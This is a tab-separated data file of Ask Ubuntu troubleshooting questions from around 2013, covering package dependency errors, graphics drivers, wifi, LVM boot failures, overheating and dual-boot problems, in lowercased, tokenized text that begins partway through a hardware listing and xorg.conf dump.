latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : display controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm bus_master cap_list configuration : driver=i915 latency=0 resources : irq:42 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) lspci display controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) i will gladly provide you any further information about my system , but i must ask you to please , be as specific as possible , i 'm really really new to all of this : ) edit : i have also tried generating a xorg.conf ( contents below ) but the system just didnt boot on first time , but on every other time it rebooted normally to login screen ( still only one screen though ) but i could n't login ( it kept going back to the login screen ) until i removed the xorg.conf file and restarted lightdm . section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` hwcursor '' # [ < bool > ] # option `` noaccel '' # [ < bool > ] # option `` shadowfb '' # [ < bool > ] # option `` videokey '' # < i > # option `` wrappedfb '' # [ < bool > ] # option `` glxvblank '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` pageflip '' # [ < bool > ] # option `` swaplimit '' # < i > # option `` asyncutsdfs '' # [ < bool > ] identifier `` card0 '' driver `` nouveau '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` card1 '' driver `` nvidia '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card2 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card3 '' driver `` modesetting '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card4 '' driver `` modesetting '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card5 '' driver `` fbdev '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card6 '' driver `` vesa '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
292064	error in downloading packages e.g . vlc media player	i have installed ubuntu 12.04 , but when i tried to install vlc media player from ubuntu software center some cache update occured ( as far as i could remember ) but i could not install it because it took so much time getting download and installed . then i shut down my pc . when i again tried to install vlc i got this error.. package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.5-0ubuntu0.12.04.1 ) but 2.0.5-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.4 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed how to fix it up ? ?
292066	ubuntu 12.10 overheating on s46ca	i bought a new notebook asus s46ca with windows 8 preinstaled . and i noticed that the left side from the touchpad gets warm . in windows 8 it does not happen . i think that fan is running faster in windows 8 ( when i reboot from ubuntu to win8 fan starts running faster than in ubuntu ) . how to set fan speed in ubuntu ? i tried : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +45.0°c ( crit = +108.0°c ) asus-isa-0000 adapter : isa adapter temp1 : +45.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +47.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +47.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +46.0°c ( high = +87.0°c , crit = +105.0°c ) there are no rpm sensors in this notebook . even in the windows i can not saw them . the cpu temps are very similar in indle mode in windows8/ubuntu , but chassis is warmer . i think i must set right boot parameters . ( my parameters : ) elevator=deadline pcie_aspm=force quiet splash acpi_backlight=vendor vt.handoff=7
292068	resume uget download started in windows in ubuntu	i have installed uget both on win 8 and ubuntu . i started a download with win8 and paused it halfway . is there a way to resume the same download in ubuntu ? i have access to the physical file in my windows download folder . these are the files : ubuntu-12.04.2-desktop-amd64.iso ubuntu-12.04.2-desktop-amd64.iso.aria2
292069	switching between gui and terminal	i am new to linux . i am planning on setting up a server and although i like the regular ubuntu desktop i like the lubuntu one a little more especially for my file server needs . what i want to know is when i use the ctrlaltf1 command to go back to the terminal does the gui turn off until i use ctrlaltf7 again or does it just sit in the background like if you used alt-tab in windows os to switch between windows ? the reason i ask is as i am still learning i still need a gui on hand until i get more used to terminal . i know there is commands to stop and start the lightdm but i was just curious what the keyboard shortcuts mentioned above do to the gui when switching between them .
292074	sometimes ( not every time ) kubuntu 13.04 fails to play sounds	i have a fresh copy of kubuntu raring ringtail . it was fine in the beginning . but now ( some times ) it fails to play any sounds . it require a reboot to activate sound . my kubuntu wellcome screen blinks whenever i get a sound problem .
292078	does the compro videomate e300f tv tuner card works on ubuntu ?	i 'm a newbee on linux , and i 'm trying to use my compro videomate e300f with no results . i 'm currently using ubuntu 13.04 , but programs like tvtime does n't recognize my tuner ( only the webcam is displayed ) . if anyone can help me , it would be appreciated . thanks in advantage .
292086	problem with my wifi	i just install the 13.04 ubuntu desktop , but my wifi donot work orlando @ hp-envy : ~ $ ifconfig eth0 link encap : ethernet direcciónhw 84:34:97:15 : ff:08 direc . inet:192.168.1.1 difus . :192.168.1.255 másc:255.255.255.0 dirección inet6 : fe80 : :8634:97ff : fe15 : ff08/64 alcance : enlace activo difusión funcionando multicast mtu:1500 métrica:1 paquetes rx:94865 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:74758 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:105177752 ( 105.1 mb ) tx bytes:10045323 ( 10.0 mb ) lo link encap : bucle local direc . inet:127.0.0.1 másc:255.0.0.0 dirección inet6 : : :1/128 alcance : anfitrión activo bucle funcionando mtu:65536 métrica:1 paquetes rx:2491 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:2491 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:0 bytes rx:273944 ( 273.9 kb ) tx bytes:273944 ( 273.9 kb ) some one can help me ?
292088	ubuntu one infinitely trying to get information	i use ubuntu one on 3 machines , it works fine on my windows laptop and on my ubuntu desktop . but on my windows work desktop the ubuntu one was working but not anymore , suddenly the documents folder stopped to sync , so i reinstalled ubuntu one 3 times . i rechecked documents folder sync and ubuntu one shows a dialog window getting information that never ends showing .
292092	ca n't boot after converting lvm2 root to lvm2 raid1	i have ubuntu 12.10 ( no updates , kernel 3.5.0-17-generic ) on first hdd ( sda ) , which uses mbr and was partitioned as `` use whole disk for ubuntu '' with lvm2 enabled . root filesystem is on lvm2 ( vg : ubuntu ) . today i added second hdd ( sdb ) with same size , partitioned it like first hdd , created lvm2 pv and converted root lv to raid1 : pvcreate /dev/sdb5 vgextend ubuntu /dev/sdb5 lvconvert -- type raid1 -m1 /dev/ubuntu/root /dev/sdb5 after 100 % resync i rebooted and initramfs was unable to find root fs : begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . ... ( kernel messages ) gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/ubuntu-root does not exist . dropping to a shell ! there is list of modules : ( initramfs ) cat /proc/modules hid_generic usbhid hid e1000 raid10 raid456 async_pq async_xor xor async_memcpy async_raid6_recov raid6_pq async_tx raid1 raid0 multipath linear ( initramfs ) cat /proc/cmdline boot_image=/vmlinux-3.5.0-17-generic root=/dev/mapper/ubuntu-root ro ( initramfs ) ls /dev/mapper control ubuntu-swap_1 there is output from lvm utility : lvm > pvscan pv /dev/sda5 vg ubuntu lvm2 [ 13.76 gib / 408.00 mib free ] pv /dev/sdb5 vg ubuntu lvm2 [ 13.76 gib / 508.00 mib free ] lvm > vgscan reading all physical volumes . this may take a while ... found volume group `` ubuntu '' using metadata type lvm2 lvm > lvscan inactive '/dev/ubuntu/root ' [ 13.26 gib ] inherit active '/dev/ubuntu/swap_1 ' [ 100.00 mib ] inherit lvm > lvdisplay ubuntu -- - logical volume -- - lv path /dev/ubuntu/root lv name root vg name ubuntu lv uuid xxxxxxxxxxxxxxx lv write access read/write lv creation host , time ubuntu , 2013-05-07 lv status not available < < < < < ! ! ! ! lv size 13.26 gb current le 3394 mirrored volumes 2 segments 1 allocation inherit read ahead sectors auto and lvchange -ay ubuntu fails : lvm > lvchange -ay ubuntu /sbin/modprobe failed : 1 ca n't process lv root : raid1 target support missing from kernel ? what is missing from initrd ?
292098	how to update java for use with chromium on 13.04	i followed the instructions here : oracle ( sun ) java jre for ubuntu , linux mint and debian and successfully have enabled latest java and works properly with firefox . chromium ; however , reports that i need to download a critical security update . per the article i enabled the symbolic link for use with ff . since it did n't seem that chromium would pick up this link , i created a separate one for chromium via this command and shut down and restarted my browser : sudo ln -s /opt/java/64/jre1.7.0_21/lib/amd64/libnpjp2.so /usr/lib/chromium-browser/plugins i would rather not install ice-tea if possible . what am i doing wrong ?
292099	ux31a freezes when running out of memory	i have difficulties to understand swap policy . i have installed system ( ubuntu 13.04 but 12.10 had same issue ) with 4gb of swap partition because ux31a has 4 gb of memory . problem is that every time system run out of memory and starts to write to swap it stops to respond . freezes for like 5 min . so i thought after some readings that maybe i should set swapiness to 10 and i did . after system went out of memory - same issue . then i read ssd should not have any swap and i have set to turn swap off when system starts now i have swap turned off and my free -m looks like : total used free shared buffers cached mem : 3840 3340 499 0 33 1293 -/+ buffers/cache : 2013 1827 swap : 0 0 unfortunately problem remains unsolved . looks like buffers/cache eat all memory and when memory gets to 0 i have exactly same issue . i thought buffers/cache should automatically free some memory when needed , but i think it doesn't what can i do to avoid system freezes ? additional information : when system freezes after a while it may respond to some commends and i was able to get to console on different session ( ctrl + alt + f1 ) and run `` top '' . first processes kswapd0 , kworkers have eaten whole cpu . thank you in advance for your help
292103	updating ubuntu while dual booting win8	ive had great help from u guys and you guys are doing a gr8 job ..thanks for that i had a small doubt , i have a laptop that comes with win8 pre installed , so the uefi crap is there ... : ( i have duall booted it along with ubuntu 13.04 by turning secure boot off .. my doubt is , if say i want to upgrade to 13.10 ( when it comes out ) , should i mess around with the secure boot option or the bios or can i normally just update it via update centre ? by doing this , can i still keep win8 ? thanks !
292104	ubuntu 12.04 : why could it not read dvd ? ( encryption )	how to play commercial dvds on lenovo t-500 laptop ? i have ubuntu 12.04 , all updates could not read dvd despite having restricted extras i tried the following , but vlc does not play dvds . sudo apt-get install libdvdnav4 libdvdread4 gstreamer0.10-plugins-bad gstreamer0.10-plugins-ugly sudo /usr/share/doc/libdvdread4/install-css.sh
292105	playonlinux says i need 32bits opengl libs , can someone give me nvidia 32bit libraries	so i am totally new to ubuntu and saw that someone said that i need to install the 32bit libraries . can someone tell where do i find them ? i know i can get them with sudo apt-get install but i do n't know what they are called . hope this explains and solves the problem . i am using ubuntu 12.04 64bit version .
292107	xubuntu : how can i avoid the double-password entry ( lightdm then xscreensaver ) on user switching ?	i 'm running xubuntu raring with lightdm and xscreensaver . both users on the system have xscreensaver set to lock the screen after n minutes . however , when i click `` switch user '' ( or do gdmflexiserver -- new ) , i have to enter the password first to lightdm , then to xscreensaver . since i can already do ctrl+alt+f7/f8 to avoid the lightdm password , should n't it be possible to avoid the password dialog for already logged in users ? xscreensaver will ask for the password anyway . lightdm asking for a password that i can avoid seems like false security , while asking non-keyboard users to enter it twice is a hassle .
292114	no operating system will boot after attempting to install ubuntu 13.04 alongside windows 8 on a lenovo t530	i 've had to retry this a million times , and it 's doing my head in . please help me . i resized my partitions from within windows 8 , and disabled everything i was supposed to , i installed 13.04 from a multi-boot liveusb . once installed , i could get into ubuntu , but not windows 8 . after running boot-repair from ubuntu on my liveusb , the machine boots into this error : error : file '/boot/grub/i386-pc/normal.mod ' not found . and it gives me the grub-recovery thing . how do i get this working ? at the moment i can have only windows installed , or only ubuntu . i want both .
292122	no mysql workbench in ubuntu 12.04 software center	i have already installed mysql workbench from the software center on a recent installation of ubuntu 12.10 ( 32 bit ) with no problems . since then , i just installed ubuntu 12.04 lts on another machine ( 64 bit ) and i ca n't find it in the software center . is there a way i can enable the repositories to make it available to me ? i know it exists for 12.10 so i am assuming it is available for 12.04 . thanks for any input ! update i switch my server in the software sources gui ( from ubuntu software center go to edit - > software sources.. ) i was set to the spain server ( since i am in spain ) and i switched it to the main server , then did apt-get update and i was able to install with apt-get after that .
292131	can not upgrade from 10.04.4 lucid to next lts using terminal or synaptic	it is my first time here in this forum . i am trying to upgrade this ubuntu system to the next lts version and i am encountering some problems in order to upgrade . cristina @ cristina : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.11.1-0ubuntu7.10 ) but 2.15-0ubuntu10.2 is installed recommends : libc6-i686 python-louis : depends : liblouis0 ( > = 1.7.0-2 ) but it is not installable ubuntu-minimal : depends : libc6-i686 e : error , pkgproblemresolver : : resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies if i try it with synaptic , the tool gives me 3 broken packages : libc6 , python-louis and ubuntu-minimal . i can not upgrade this packages using synaptic or doing a apt-get -f install and in the meanwhile i can not upgrade the system . i can not upgrade the system with a fresh install . cristina @ cristina : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.4 lts ''
292132	ubuntu apt-get update fails	i installed ubuntu 12.04.2 server edition . i wanted to setup python tools , easy install , pip and eventually flask for python . i tried setting up python tools , apt-get told me to update apt-get ... then i got errors ... which sources should i put in my sources.list file ? i have no access to the gui desktop also , and apt-get install desktop also doesnt work ... this is how my sources.list file looks like currently ` # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main ` and these are the errors i get at the bottom of sudo apt-get update command w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/source/sources 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
292141	shared library not loading . loading only under root	i have an executable that requires a shared library that resides in /opt/ ... folder . i have included the path in ld_library_path under /etc/environment and updated it using source /etc/environment . when i run this executable without root permissions , i get an error saying libxxx.so : can not open shared object file : no such file or directory . but when i run it with sudo , it runs . though the problem is , the license is not under root user , therefore it throws an error regarding license . i changed the permission for /opt/ ... so that the normal user can create and delete files . though , it does not help . what 's wrong and how do i fix this ?
292144	uninstall ubuntu 12.04	i want to uninstall my ubuntu 12.04 ( installed using wubi ) . my ubuntu is on one of partitions that i do n't want to delete my partition.i using win 7 . and i do n't use grub
292146	steam has a problem with my nvidia diver	i 'm having some difficulty with steam . i installed the proprietary driver using additional drivers , and up until now , thought it had installed correctly . all my desktop effects worked flawlessly . but , when i tried to run steam , it said , `` opengl glx context is not using direct rendering , which may cause performance problems '' . so , i thought that perhaps i had n't installed the driver yet . opening additional drivers , it shows nvidia 3.10 , but says that `` this driver has been actived , but is not in use '' trying to launch portal , is says it could n't find the `` required entry point 'gelgeterror ' '' . so , as far as i can tell , steam thinks that i do n't have the propietary driver installed . but , when i open nvida x server settings , it clearly says i have driver 3.10 . can anyone please tell me what 's going ? edit : sorry for taking so long to respond , as requested , here is the result of running `` lsmod | grep nv '' nvidia 9410995 52
292148	installation issue : no option to install	i got a new computer ( hp envy h8-1534 ) pre-installed with windows 8 , and came across an interesting issue while attempting to install ubuntu . so , as i install , i do n't get that slide asking whether or not i want to install side by side with another operating system , wipe the entire disk , or make my own configuration . i get this slide instead : click on the image to see a full-resolution version . if i push anything , it then gives me the message : `` ubuntu has experienced an internal error . '' i then tried using an ubuntu 12.04.2 disk that worked fine for me in the past , and got exactly the same problem .
292149	wifi not working	while i was trying to install ubuntu , the wifi was working fine but after installation and update , i 'm unable to connect to wifi . can you please guide me on it . seeing other posts with similar description i 've run lspci -nn and here are the results . lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile 4 series chipset memory controller hub [ 8086:2a40 ] ( rev 07 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a42 ] ( rev 07 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a43 ] ( rev 07 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 [ 8086:2937 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 [ 8086:2938 ] ( rev 03 ) 00:1a.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 [ 8086:2939 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 [ 8086:293c ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 03 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 2 [ 8086:2942 ] ( rev 03 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 4 [ 8086:2946 ] ( rev 03 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 5 [ 8086:2948 ] ( rev 03 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 6 [ 8086:294a ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 [ 8086:2934 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 [ 8086:2935 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 [ 8086:2936 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 [ 8086:293a ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev 93 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation ich9m lpc interface controller [ 8086:2919 ] ( rev 03 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] [ 8086:2929 ] ( rev 03 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801i ( ich9 family ) smbus controller [ 8086:2930 ] ( rev 03 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) 0f:00.0 sd host controller [ 0805 ] : ricoh co ltd mmc/sd host controller [ 1180 : e822 ] ( rev 01 ) 0f:00.1 system peripheral [ 0880 ] : ricoh co ltd r5u2xx ( r5u230 / r5u231 / r5u241 ) [ memory stick host controller ] [ 1180 : e230 ] ( rev 01 ) 0f:00.3 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 pcie ieee 1394 controller [ 1180 : e832 ] ( rev 01 )
292158	how to disable empathy notifications in ubuntu 13.04	in 12.10 there was a tab on preferences of empathy that i could configure notifications in empathy and now in 13.04 it 's not available anymore so is there any way to disable the notifications or the balloons ? ?
